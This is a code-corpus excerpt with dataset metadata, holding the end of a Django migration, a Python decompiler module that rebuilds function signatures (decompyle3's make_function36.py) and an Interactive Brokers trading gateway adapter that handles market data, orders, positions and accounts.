model_name='relatedpage',
name='page_to',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_page_to', to='blog.BlogPage', verbose_name='Page To'),
),
]
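    # Net effect: the old BlogPage.related_pages field is removed and replaced
    # by an explicit RelatedPage through model, whose page_from/page_to
    # ParentalKeys store each related-page link as its own row.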
| [
"[email protected]"
]
| |
f419cc7d65322b77ae227506168498401d3d7c01 | a38180435ac5786185c0aa48891c0aed0ab9d72b | /S4/S4 Decompiler/decompyle3/semantics/make_function36.py | 602936bbf3b0f37273e472b635dbfb0fc03dfe5d | [
"CC-BY-4.0"
]
| permissive | NeonOcean/Environment | e190b6b09dd5dbecba0a38c497c01f84c6f9dc7d | ca658cf66e8fd6866c22a4a0136d415705b36d26 | refs/heads/master | 2022-12-03T13:17:00.100440 | 2021-01-09T23:26:55 | 2021-01-09T23:26:55 | 178,096,522 | 1 | 1 | CC-BY-4.0 | 2022-11-22T20:24:59 | 2019-03-28T00:38:17 | Python | UTF-8 | Python | false | false | 12,326 | py | # Copyright (c) 2019-2020 by Rocky Bernstein
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
All the crazy things we have to do to handle Python functions.
"""
from xdis import (
iscode,
CO_GENERATOR,
CO_ASYNC_GENERATOR,
code_has_star_arg,
code_has_star_star_arg,
)
from decompyle3.scanner import Code
from decompyle3.semantics.parser_error import ParserError
from decompyle3.parsers.main import ParserError as ParserError2
from decompyle3.semantics.helper import (
find_all_globals,
find_globals_and_nonlocals,
find_none,
)
from decompyle3.show import maybe_show_tree_param_default
def make_function36(self, node, is_lambda, nested=1, code_node=None):
"""Dump function definition, doc string, and function body in
Python version 3.6 and above.
"""
# MAKE_CLOSURE adds an additional closure slot
# In Python 3.6 and above stack change again. I understand
# 3.7 changes some of those changes, although I don't
# see it in this code yet. Yes, it is hard to follow
# and I am sure I haven't been able to keep up.
# Thank you, Python.
def build_param(ast, name, default, annotation=None):
"""build parameters:
- handle defaults
- handle format tuple parameters
"""
value = default
maybe_show_tree_param_default(self.showast, name, value)
if annotation:
result = "%s: %s=%s" % (name, annotation, value)
else:
result = "%s=%s" % (name, value)
# The below can probably be removed. This is probably
# a holdover from days when LOAD_CONST erroneously
# didn't handle LOAD_CONST None properly
if result[-2:] == "= ": # default was 'LOAD_CONST None'
result += "None"
return result
# MAKE_FUNCTION_... or MAKE_CLOSURE_...
assert node[-1].kind.startswith("MAKE_")
# Python 3.3+ adds a qualified name at TOS (-1)
# moving down the LOAD_LAMBDA instruction
lambda_index = -3
args_node = node[-1]
annotate_dict = {}
# Get a list of tree nodes that constitute the values for the "default
# parameters"; these are default values that appear before any *, and are
# not to be confused with keyword parameters which may appear after *.
args_attr = args_node.attr
if len(args_attr) == 3:
pos_args, kw_args, annotate_argc = args_attr
else:
pos_args, kw_args, annotate_argc, closure = args_attr
i = -4 if node[-2] != "docstring" else -5
kw_pairs = 0
if annotate_argc:
# Turn into subroutine and DRY with other use
annotate_node = node[i]
if annotate_node == "expr":
annotate_node = annotate_node[0]
annotate_name_node = annotate_node[-1]
if annotate_node == "dict" and annotate_name_node.kind.startswith(
"BUILD_CONST_KEY_MAP"
):
types = [self.traverse(n, indent="") for n in annotate_node[:-2]]
names = annotate_node[-2].attr
l = len(types)
assert l == len(names)
for i in range(l):
annotate_dict[names[i]] = types[i]
pass
pass
i -= 1
if closure:
# FIXME: fill in
# annotate = node[i]
i -= 1
if kw_args:
kw_node = node[pos_args]
if kw_node == "expr":
kw_node = kw_node[0]
if kw_node == "dict":
kw_pairs = kw_node[-1].attr
defparams = []
# FIXME: DRY with code below
default, kw_args, annotate_argc = args_node.attr[0:3]
if default:
expr_node = node[0]
if node[0] == "pos_arg":
expr_node = expr_node[0]
assert expr_node == "expr", "expecting mkfunc default node to be an expr"
if expr_node[0] == "LOAD_CONST" and isinstance(expr_node[0].attr, tuple):
defparams = [repr(a) for a in expr_node[0].attr]
elif expr_node[0] in frozenset(("list", "tuple", "dict", "set")):
defparams = [self.traverse(n, indent="") for n in expr_node[0][:-1]]
else:
defparams = []
pass
if lambda_index and is_lambda and iscode(node[lambda_index].attr):
assert node[lambda_index].kind == "LOAD_LAMBDA"
code = node[lambda_index].attr
else:
code = code_node.attr
assert iscode(code)
scanner_code = Code(code, self.scanner, self.currentclass)
# add defaults values to parameter names
argc = code.co_argcount
kwonlyargcount = code.co_kwonlyargcount
paramnames = list(scanner_code.co_varnames[:argc])
kwargs = list(scanner_code.co_varnames[argc : argc + kwonlyargcount])
paramnames.reverse()
defparams.reverse()
try:
ast = self.build_ast(
scanner_code._tokens,
scanner_code._customize,
is_lambda=is_lambda,
noneInNames=("None" in code.co_names),
)
except (ParserError, ParserError2) as p:
self.write(str(p))
if not self.tolerate_errors:
self.ERROR = p
return
i = len(paramnames) - len(defparams)
# build parameters
params = []
if defparams:
for i, defparam in enumerate(defparams):
params.append(
build_param(
ast, paramnames[i], defparam, annotate_dict.get(paramnames[i])
)
)
for param in paramnames[i + 1 :]:
if param in annotate_dict:
params.append("%s: %s" % (param, annotate_dict[param]))
else:
params.append(param)
else:
for param in paramnames:
if param in annotate_dict:
params.append("%s: %s" % (param, annotate_dict[param]))
else:
params.append(param)
params.reverse() # back to correct order
if code_has_star_arg(code):
star_arg = code.co_varnames[argc + kwonlyargcount]
if star_arg in annotate_dict:
params.append("*%s: %s" % (star_arg, annotate_dict[star_arg]))
else:
params.append("*%s" % star_arg)
argc += 1
# dump parameter list (with default values)
if is_lambda:
self.write("lambda")
if len(params):
self.write(" ", ", ".join(params))
elif kwonlyargcount > 0 and not (4 & code.co_flags):
assert argc == 0
self.write(" ")
# If the last statement is None (which is the
# same thing as "return None" in a lambda) and the
# next to last statement is a "yield". Then we want to
# drop the (return) None since that was just put there
# to have something to after the yield finishes.
# FIXME: this is a bit hoaky and not general
if (
len(ast) > 1
and self.traverse(ast[-1]) == "None"
and self.traverse(ast[-2]).strip().startswith("yield")
):
del ast[-1]
# Now pick out the expr part of the last statement
ast_expr = ast[-1]
while ast_expr.kind != "expr":
ast_expr = ast_expr[0]
ast[-1] = ast_expr
pass
else:
self.write("(", ", ".join(params))
# self.println(indent, '#flags:\t', int(code.co_flags))
ends_in_comma = False
if kwonlyargcount > 0:
if not (4 & code.co_flags):
if argc > 0:
self.write(", *, ")
else:
self.write("*, ")
pass
ends_in_comma = True
else:
if argc > 0:
self.write(", ")
ends_in_comma = True
ann_dict = kw_dict = default_tup = None
fn_bits = node[-1].attr
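    # fn_bits mirrors the CPython MAKE_FUNCTION flag word: bit 0 -> tuple of
    # positional defaults, bit 1 -> dict of kw-only defaults, bit 2 ->
    # annotations, bit 3 -> closure cells; it is read back-to-front below.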
# Skip over:
# MAKE_FUNCTION,
# optional docstring
# LOAD_CONST qualified name,
# LOAD_CONST code object
index = -5 if node[-2] == "docstring" else -4
if fn_bits[-1]:
index -= 1
if fn_bits[-2]:
ann_dict = node[index]
index -= 1
if fn_bits[-3]:
kw_dict = node[index]
index -= 1
if fn_bits[-4]:
default_tup = node[index]
if kw_dict == "expr":
kw_dict = kw_dict[0]
kw_args = [None] * kwonlyargcount
# FIXME: handle free_tup, ann_dict, and default_tup
if kw_dict:
assert kw_dict == "dict"
defaults = [self.traverse(n, indent="") for n in kw_dict[:-2]]
names = eval(self.traverse(kw_dict[-2]))
assert len(defaults) == len(names)
sep = ""
# FIXME: possibly handle line breaks
for i, n in enumerate(names):
idx = kwargs.index(n)
if annotate_dict and n in annotate_dict:
t = "%s: %s=%s" % (n, annotate_dict[n], defaults[i])
else:
t = "%s=%s" % (n, defaults[i])
kw_args[idx] = t
pass
pass
# handle others
    other_kw = [c is None for c in kw_args]
for i, flag in enumerate(other_kw):
if flag:
n = kwargs[i]
if n in annotate_dict:
kw_args[i] = "%s: %s" % (n, annotate_dict[n])
else:
kw_args[i] = "%s" % n
self.write(", ".join(kw_args))
ends_in_comma = False
pass
else:
if argc == 0:
ends_in_comma = True
if code_has_star_star_arg(code):
if not ends_in_comma:
self.write(", ")
star_star_arg = code.co_varnames[argc + kwonlyargcount]
if annotate_dict and star_star_arg in annotate_dict:
self.write("**%s: %s" % (star_star_arg, annotate_dict[star_star_arg]))
else:
self.write("**%s" % star_star_arg)
if is_lambda:
self.write(": ")
else:
self.write(")")
if annotate_dict and "return" in annotate_dict:
self.write(" -> %s" % annotate_dict["return"])
self.println(":")
if node[-2] == "docstring" and not is_lambda:
# docstring exists, dump it
self.println(self.traverse(node[-2]))
assert ast in ("stmts", "lambda_start")
all_globals = find_all_globals(ast, set())
globals, nonlocals = find_globals_and_nonlocals(
ast, set(), set(), code, self.version
)
for g in sorted((all_globals & self.mod_globs) | globals):
self.println(self.indent, "global ", g)
for nl in sorted(nonlocals):
self.println(self.indent, "nonlocal ", nl)
self.mod_globs -= all_globals
has_none = "None" in code.co_names
rn = has_none and not find_none(ast)
self.gen_source(
ast, code.co_name, scanner_code._customize, is_lambda=is_lambda, returnNone=rn
)
# In obscure cases, a function may be a generator but the "yield"
# was optimized away. Here, we need to put in unreachable code to
# add in "yield" just so that the compiler will mark
# the GENERATOR bit of the function. See for example
# Python 3.x's test_connection.py and test_contexlib_async test programs.
if not is_lambda and code.co_flags & (CO_GENERATOR | CO_ASYNC_GENERATOR):
need_bogus_yield = True
for token in scanner_code._tokens:
if token == "YIELD_VALUE":
need_bogus_yield = False
break
pass
if need_bogus_yield:
self.template_engine(("%|if False:\n%+%|yield None%-",), node)
scanner_code._tokens = None # save memory
scanner_code._customize = None # save memory
| [
"[email protected]"
]
| |
c90f2f2b47255a6b5eea2c2bb753ceb5989e6fe0 | 51fd69cc133a4f5eba61c90dbc87ff6531445840 | /ib/ib_gateway.py | d826f27ac7409133e3d98ecf5fef22fce4fd8ed7 | []
| no_license | risecloud/pyktrader2 | 36c7a8b3730fb6e900df488e67d78b453b14baf0 | 0d012bae464969dd893b7bf87ae689efa2d0bccc | refs/heads/master | 2021-04-28T14:19:54.616928 | 2018-02-13T17:56:26 | 2018-02-13T17:56:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,983 | py | # encoding: UTF-8
'''
Interactive Brokers gateway adapter, now implemented on top of the vn.ib wrapper.
Notes:
1. The IB API can only see and manage orders placed during the current connection;
   orders placed before a program restart are not received again.
2. Likewise, fills are only pushed for trades made during the current connection.
3. Position and account updates can be subscribed to in push mode, so qryAccount
   and qryPosition are not needed.
4. Only stock and futures trading is supported for now; identifying option
   contracts in the IB API depends on several Contract fields and is complex,
   so it has not been implemented yet.
5. Overseas markets differ from domestic (Chinese) ones in many trading-rule
   details, so some field-type mappings may be imperfect; corrections welcome.
'''
import os
import json
import calendar
from datetime import datetime, timedelta
from copy import copy
from vnib import IbApi, Contract, Order, TagValueList
from gateway import *
# Mapping dictionaries between VT types and IB types (layout inherited from the CTP gateway)
# Price type mapping
priceTypeMap = {}
priceTypeMap[PRICETYPE_LIMITPRICE] = 'LMT'
priceTypeMap[PRICETYPE_MARKETPRICE] = 'MKT'
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# Direction type mapping
directionMap = {}
directionMap[DIRECTION_LONG] = 'BUY'
#directionMap[DIRECTION_SHORT] = 'SSHORT' # In IB, SSHORT means shorting a stock via margin lending (not the plain sell common in domestic markets)
directionMap[DIRECTION_SHORT] = 'SELL' # For consistency with the domestic convention, IB's SELL is mapped to vt's SHORT
directionMapReverse = {v: k for k, v in directionMap.items()}
directionMapReverse['BOT'] = DIRECTION_LONG
directionMapReverse['SLD'] = DIRECTION_SHORT
# Exchange mapping
exchangeMap = {}
exchangeMap[EXCHANGE_SMART] = 'SMART'
exchangeMap[EXCHANGE_NYMEX] = 'NYMEX'
exchangeMap[EXCHANGE_GLOBEX] = 'GLOBEX'
exchangeMap[EXCHANGE_IDEALPRO] = 'IDEALPRO'
exchangeMap[EXCHANGE_HKEX] = 'HKEX'
exchangeMap[EXCHANGE_HKFE] = 'HKFE'
exchangeMapReverse = {v:k for k,v in exchangeMap.items()}
# Order status mapping
orderStatusMap = {}
orderStatusMap[STATUS_NOTTRADED] = 'Submitted'
orderStatusMap[STATUS_ALLTRADED] = 'Filled'
orderStatusMap[STATUS_CANCELLED] = 'Cancelled'
orderStatusMapReverse = {v:k for k,v in orderStatusMap.items()}
orderStatusMapReverse['PendingSubmit'] = STATUS_UNKNOWN # vt order status types could be extended here later as needed
orderStatusMapReverse['PendingCancel'] = STATUS_UNKNOWN
orderStatusMapReverse['PreSubmitted'] = STATUS_UNKNOWN
orderStatusMapReverse['Inactive'] = STATUS_UNKNOWN
# Product class mapping
productClassMap = {}
productClassMap[PRODUCT_EQUITY] = 'STK'
productClassMap[PRODUCT_FUTURES] = 'FUT'
productClassMap[PRODUCT_OPTION] = 'OPT'
productClassMap[PRODUCT_FOREX] = 'CASH'
productClassMap[PRODUCT_INDEX] = 'IND'
productClassMapReverse = {v:k for k,v in productClassMap.items()}
# Option type mapping
optionTypeMap = {}
optionTypeMap[OPTION_CALL] = 'CALL'
optionTypeMap[OPTION_PUT] = 'PUT'
optionTypeMap = {v:k for k,v in optionTypeMap.items()}
# Currency mapping
currencyMap = {}
currencyMap[CURRENCY_USD] = 'USD'
currencyMap[CURRENCY_CNY] = 'CNY'
currencyMap[CURRENCY_HKD] = 'HKD'
currencyMap = {v:k for k,v in currencyMap.items()}
# Mapping from tick data field IDs to attribute names
tickFieldMap = {}
tickFieldMap[0] = 'bidVolume1'
tickFieldMap[1] = 'bidPrice1'
tickFieldMap[2] = 'askPrice1'
tickFieldMap[3] = 'askVolume1'
tickFieldMap[4] = 'lastPrice'
tickFieldMap[5] = 'lastVolume'
tickFieldMap[6] = 'highPrice'
tickFieldMap[7] = 'lowPrice'
tickFieldMap[8] = 'volume'
tickFieldMap[9] = 'preClosePrice'
tickFieldMap[14] = 'openPrice'
tickFieldMap[22] = 'openInterest'
# Mapping from account data keys to attribute names
accountKeyMap = {}
accountKeyMap['NetLiquidationByCurrency'] = 'balance'
accountKeyMap['NetLiquidation'] = 'balance'
accountKeyMap['UnrealizedPnL'] = 'positionProfit'
accountKeyMap['AvailableFunds'] = 'available'
accountKeyMap['MaintMarginReq'] = 'margin'
########################################################################
class IbGateway(Gateway):
"""IB接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='IB'):
"""Constructor"""
super(IbGateway, self).__init__(eventEngine, gatewayName)
        self.host = EMPTY_STRING                # connection host
        self.port = EMPTY_INT                   # connection port
        self.clientId = EMPTY_INT               # client id
        self.accountCode = EMPTY_STRING         # account code
        self.tickerId = 0                       # ticker id counter for market data subscriptions
        self.tickDict = {}                      # tick snapshot dict: key is tickerId, value is a VtTickData object
        self.tickProductDict = {}               # product class per tick: key is tickerId, value is the product class
        self.orderId = 0                        # order id counter
        self.orderDict = {}                     # order dict: key is orderId, value is a VtOrderData object
        self.accountDict = {}                   # account dict
        self.contractDict = {}                  # contract dict
        self.subscribeReqDict = {}              # cache of subscribe requests made before connection
        self.connected = False                  # connection status
        self.api = IbWrapper(self)              # API wrapper instance
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
fileName = self.file_prefix + 'connect.json'
try:
f = file(fileName)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = u'Failed to read connection config, please check'
self.onLog(log)
return
        # Parse the json config
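        # Expected connect.json shape, inferred from the fields read below
        # (all values here are illustrative, not real endpoints/accounts):
        #   {"host": "127.0.0.1", "port": 7497, "clientId": 1, "accountCode": "DU000000"}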
setting = json.load(f)
try:
self.host = str(setting['host'])
self.port = int(setting['port'])
self.clientId = int(setting['clientId'])
self.accountCode = str(setting['accountCode'])
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = u'Connection config is missing fields, please check'
self.onLog(log)
return
        # Initiate the connection
self.api.eConnect(self.host, self.port, self.clientId, False)
        # Request the server time
self.api.reqCurrentTime()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
# 如果尚未连接行情,则将订阅请求缓存下来后直接返回
if not self.connected:
self.subscribeReqDict[subscribeReq.symbol] = subscribeReq
return
contract = Contract()
contract.localSymbol = str(subscribeReq.symbol)
contract.exchange = exchangeMap.get(subscribeReq.exchange, '')
contract.secType = productClassMap.get(subscribeReq.productClass, '')
contract.currency = currencyMap.get(subscribeReq.currency, '')
contract.expiry = subscribeReq.expiry
contract.strike = subscribeReq.strikePrice
contract.right = optionTypeMap.get(subscribeReq.optionType, '')
        # Request full contract details
self.tickerId += 1
self.api.reqContractDetails(self.tickerId, contract)
        # Create the contract object and cache it in the dict
ct = VtContractData()
ct.gatewayName = self.gatewayName
ct.symbol = str(subscribeReq.symbol)
ct.exchange = subscribeReq.exchange
ct.vtSymbol = '.'.join([ct.symbol, ct.exchange])
ct.productClass = subscribeReq.productClass
self.contractDict[ct.vtSymbol] = ct
        # Subscribe to market data
self.tickerId += 1
self.api.reqMktData(self.tickerId, contract, '', False, TagValueList())
        # Create the tick object and cache it in the dict
tick = VtTickData()
tick.symbol = subscribeReq.symbol
tick.exchange = subscribeReq.exchange
tick.vtSymbol = '.'.join([tick.symbol, tick.exchange])
tick.gatewayName = self.gatewayName
self.tickDict[self.tickerId] = tick
self.tickProductDict[self.tickerId] = subscribeReq.productClass
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
# 增加报单号1,最后再次进行查询
# 这里双重设计的目的是为了防止某些情况下,连续发单时,nextOrderId的回调推送速度慢导致没有更新
self.orderId += 1
        # Create the contract object
contract = Contract()
contract.localSymbol = str(orderReq.symbol)
contract.exchange = exchangeMap.get(orderReq.exchange, '')
contract.secType = productClassMap.get(orderReq.productClass, '')
contract.currency = currencyMap.get(orderReq.currency, '')
contract.expiry = orderReq.expiry
contract.strike = orderReq.strikePrice
contract.right = optionTypeMap.get(orderReq.optionType, '')
contract.lastTradeDateOrContractMonth = str(orderReq.lastTradeDateOrContractMonth)
contract.multiplier = str(orderReq.multiplier)
        # Create the order object
order = Order()
order.orderId = self.orderId
order.clientId = self.clientId
order.action = directionMap.get(orderReq.direction, '')
order.lmtPrice = orderReq.price
order.totalQuantity = orderReq.volume
order.orderType = priceTypeMap.get(orderReq.priceType, '')
        # Place the order
self.api.placeOrder(self.orderId, contract, order)
        # Query the next valid order id
self.api.reqIds(1)
        # Return the vt order id
vtOrderID = '.'.join([self.gatewayName, str(self.orderId)])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.cancelOrder(int(cancelOrderReq.orderID))
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = 'No need to query Account info'
self.onLog(log)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = 'No need to query Position info'
self.onLog(log)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.eDisconnect()
########################################################################
class IbWrapper(IbApi):
"""IB回调接口的实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(IbWrapper, self).__init__()
        self.apiStatus = False                  # connection status
        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway object name
        self.tickDict = gateway.tickDict        # tick snapshot dict: key is tickerId, value is a VtTickData object
        self.orderDict = gateway.orderDict      # order dict
        self.accountDict = gateway.accountDict  # account dict
        self.contractDict = gateway.contractDict  # contract dict
self.tickProductDict = gateway.tickProductDict
self.subscribeReqDict = gateway.subscribeReqDict
#----------------------------------------------------------------------
def nextValidId(self, orderId):
""""""
self.gateway.orderId = orderId
#----------------------------------------------------------------------
def currentTime(self, time):
"""连接成功后推送当前时间"""
dt = datetime.fromtimestamp(time)
t = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
self.apiStatus = True
self.gateway.connected = True
log = VtLogData()
log.gatewayName = self.gatewayName
        log.logContent = u'Market data server connected, t = %s' % t
self.gateway.onLog(log)
for symbol, req in self.subscribeReqDict.items():
del self.subscribeReqDict[symbol]
self.gateway.subscribe(req)
#----------------------------------------------------------------------
def connectAck(self):
""""""
pass
#----------------------------------------------------------------------
def error(self, id_, errorCode, errorString):
"""错误推送"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = errorCode
err.errorMsg = errorString.decode('GBK')
self.gateway.onError(err)
#----------------------------------------------------------------------
def accountSummary(self, reqId, account, tag, value, curency):
""""""
pass
#----------------------------------------------------------------------
def accountSummaryEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def tickPrice(self, tickerId, field, price, canAutoExecute):
"""行情价格相关推送"""
if field in tickFieldMap:
            # For stocks, futures, etc., a new price only refreshes the tick cache;
            # a new tick is pushed only after a trade, when tickString updates the
            # last price, i.e. bid/ask changes alone do not trigger a tick push.
tick = self.tickDict[tickerId]
key = tickFieldMap[field]
tick.__setattr__(key, price)
            # IB forex quotes have no last price/time; compute them locally and push immediately
if self.tickProductDict[tickerId] == PRODUCT_FOREX:
tick.lastPrice = (tick.bidPrice1 + tick.askPrice1) / 2
dt = datetime.now()
tick.time = dt.strftime('%H:%M:%S.%f')
tick.date = dt.strftime('%Y%m%d')
                # Push the updated tick
newtick = copy(tick)
self.gateway.onTick(newtick)
else:
print field
#----------------------------------------------------------------------
def tickSize(self, tickerId, field, size):
"""行情数量相关推送"""
if field in tickFieldMap:
tick = self.tickDict[tickerId]
key = tickFieldMap[field]
tick.__setattr__(key, size)
else:
print field
#----------------------------------------------------------------------
def tickOptionComputation(self, tickerId, tickType, impliedVol, delta, optPrice, pvDividend, gamma, vega, theta, undPrice):
""""""
pass
#----------------------------------------------------------------------
def tickGeneric(self, tickerId, tickType, value):
""""""
pass
#----------------------------------------------------------------------
def tickString(self, tickerId, tickType, value):
"""行情补充信息相关推送"""
# 如果是最新成交时间戳更新
if tickType == '45':
tick = self.tickDict[tickerId]
dt = datetime.fromtimestamp(value)
tick.time = dt.strftime('%H:%M:%S.%f')
tick.date = dt.strftime('%Y%m%d')
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def tickEFP(self, tickerId, tickType, basisPoints, formattedBasisPoints, totalDividends, holdDays, futureLastTradeDate, dividendImpact, dividendsToLastTradeDate):
""""""
pass
#----------------------------------------------------------------------
def orderStatus(self, orderId, status, filled, remaining, avgFillPrice, permId, parentId, lastFillPrice, clientId, whyHeld):
"""委托状态更新"""
orderId = str(orderId)
if orderId in self.orderDict:
od = self.orderDict[orderId]
else:
            od = VtOrderData()  # od stands for orderData
od.orderID = orderId
od.vtOrderID = '.'.join([self.gatewayName, orderId])
od.gatewayName = self.gatewayName
self.orderDict[orderId] = od
od.status = orderStatusMapReverse.get(status, STATUS_UNKNOWN)
od.tradedVolume = filled
newod = copy(od)
self.gateway.onOrder(newod)
#----------------------------------------------------------------------
def openOrder(self, orderId, contract, order, orderState):
"""下达委托推送"""
orderId = str(orderId) # orderId是整数
if orderId in self.orderDict:
od = self.orderDict[orderId]
else:
            od = VtOrderData()  # od stands for orderData
od.orderID = orderId
od.vtOrderID = '.'.join([self.gatewayName, orderId])
od.symbol = contract.localSymbol
od.exchange = exchangeMapReverse.get(contract.exchange, '')
od.vtSymbol = '.'.join([od.symbol, od.exchange])
od.gatewayName = self.gatewayName
self.orderDict[orderId] = od
od.direction = directionMapReverse.get(order.action, '')
od.price = order.lmtPrice
od.totalVolume = order.totalQuantity
newod = copy(od)
self.gateway.onOrder(newod)
#----------------------------------------------------------------------
def openOrderEnd(self):
""""""
pass
#----------------------------------------------------------------------
def winError(self, str_, lastError):
""""""
pass
#----------------------------------------------------------------------
def connectionClosed(self):
"""断线"""
self.apiStatus = False
self.gateway.connected = False
log = VtLogData()
log.gatewayName = self.gatewayName
        log.logContent = u'Server connection closed'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def updateAccountValue(self, key, val, currency, accountName):
"""更新账户数据"""
# 仅逐个字段更新数据,这里对于没有currency的推送忽略
if currency:
name = '.'.join([accountName, currency])
if name in self.accountDict:
account = self.accountDict[name]
else:
account = VtAccountData()
account.accountID = name
account.vtAccountID = name
account.gatewayName = self.gatewayName
self.accountDict[name] = account
if key in accountKeyMap:
k = accountKeyMap[key]
account.__setattr__(k, float(val))
#----------------------------------------------------------------------
def updatePortfolio(self, contract, position, marketPrice, marketValue, averageCost, unrealizedPNL, realizedPNL, accountName):
"""持仓更新"""
pos = VtPositionData()
pos.symbol = contract.localSymbol
pos.exchange = exchangeMapReverse.get(contract.exchange, contract.exchange)
pos.vtSymbol = '.'.join([pos.symbol, pos.exchange])
pos.direction = DIRECTION_NET
pos.position = position
pos.price = averageCost
pos.vtPositionName = pos.vtSymbol
pos.gatewayName = self.gatewayName
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def updateAccountTime(self, timeStamp):
"""更新账户时间"""
# 推送数据
for account in self.accountDict.values():
newaccount = copy(account)
self.gateway.onAccount(newaccount)
#----------------------------------------------------------------------
def accountDownloadEnd(self, accountName):
""""""
pass
#----------------------------------------------------------------------
def contractDetails(self, reqId, contractDetails):
"""合约查询回报"""
symbol = contractDetails.summary.localSymbol
exchange = exchangeMapReverse.get(contractDetails.summary.exchange, EXCHANGE_UNKNOWN)
vtSymbol = '.'.join([symbol, exchange])
ct = self.contractDict.get(vtSymbol, None)
if not ct:
return
ct.name = contractDetails.longName.decode('UTF-8')
ct.priceTick = contractDetails.minTick
        # Push the contract
self.gateway.onContract(ct)
#----------------------------------------------------------------------
def bondContractDetails(self, reqId, contractDetails):
""""""
pass
#----------------------------------------------------------------------
def contractDetailsEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def execDetails(self, reqId, contract, execution):
"""成交推送"""
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.tradeID = execution.execId
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.symbol = contract.localSymbol
trade.exchange = exchangeMapReverse.get(contract.exchange, '')
trade.vtSymbol = '.'.join([trade.symbol, trade.exchange])
trade.orderID = str(execution.orderId)
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.direction = directionMapReverse.get(execution.side, '')
trade.price = execution.price
trade.volume = execution.shares
trade.tradeTime = execution.time
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def execDetailsEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def updateMktDepth(self, id_, position, operation, side, price, size):
""""""
pass
#----------------------------------------------------------------------
def updateMktDepthL2(self, id_, position, marketMaker, operation, side, price, size):
""""""
pass
#----------------------------------------------------------------------
def updateNewsBulletin(self, msgId, msgType, newsMessage, originExch):
""""""
pass
#----------------------------------------------------------------------
def managedAccounts(self, accountsList):
"""推送管理账户的信息"""
l = accountsList.split(',')
        # Subscribe to push updates of account data
for account in l:
self.reqAccountUpdates(True, account)
#----------------------------------------------------------------------
def receiveFA(self, pFaDataType, cxml):
""""""
pass
#----------------------------------------------------------------------
def historicalData(self, reqId, date, open_, high, low, close, volume, barCount, WAP, hasGaps):
""""""
pass
#----------------------------------------------------------------------
def scannerParameters(self, xml):
""""""
pass
#----------------------------------------------------------------------
def scannerData(self, reqId, rank, contractDetails, distance, benchmark, projection, legsStr):
""""""
pass
#----------------------------------------------------------------------
def scannerDataEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def realtimeBar(self, reqId, time, open_, high, low, close, volume, wap, count):
""""""
pass
#----------------------------------------------------------------------
def fundamentalData(self, reqId, data):
""""""
pass
#----------------------------------------------------------------------
def deltaNeutralValidation(self, reqId, underComp):
""""""
pass
#----------------------------------------------------------------------
def tickSnapshotEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def marketDataType(self, reqId, marketDataType):
""""""
pass
#----------------------------------------------------------------------
def commissionReport(self, commissionReport):
""""""
pass
#----------------------------------------------------------------------
def position(self, account, contract, position, avgCost):
""""""
pass
#----------------------------------------------------------------------
def positionEnd(self):
""""""
pass
#----------------------------------------------------------------------
def verifyMessageAPI(self, apiData):
""""""
pass
#----------------------------------------------------------------------
def verifyCompleted(self, isSuccessful, errorText):
""""""
pass
#----------------------------------------------------------------------
def displayGroupList(self, reqId, groups):
""""""
pass
#----------------------------------------------------------------------
def displayGroupUpdated(self, reqId, contractInfo):
""""""
pass
#----------------------------------------------------------------------
def verifyAndAuthMessageAPI(self, apiData, xyzChallange):
""""""
pass
#----------------------------------------------------------------------
def verifyAndAuthCompleted(self, isSuccessful, errorText):
""""""
pass
#----------------------------------------------------------------------
def positionMulti(self, reqId, account, modelCode, contract, pos, avgCost):
""""""
pass
#----------------------------------------------------------------------
def positionMultiEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def accountUpdateMulti(self, reqId, account, modelCode, key, value, currency):
""""""
pass
#----------------------------------------------------------------------
def accountUpdateMultiEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def securityDefinitionOptionalParameter(self, reqId, exchange, underlyingConId, tradingClass, multiplier, expirations, strikes):
""""""
pass
#----------------------------------------------------------------------
def securityDefinitionOptionalParameterEnd(self, reqId):
""""""
pass
#----------------------------------------------------------------------
def softDollarTiers(self, reqId, tiers):
""""""
pass
| [
"[email protected]"
]
| |
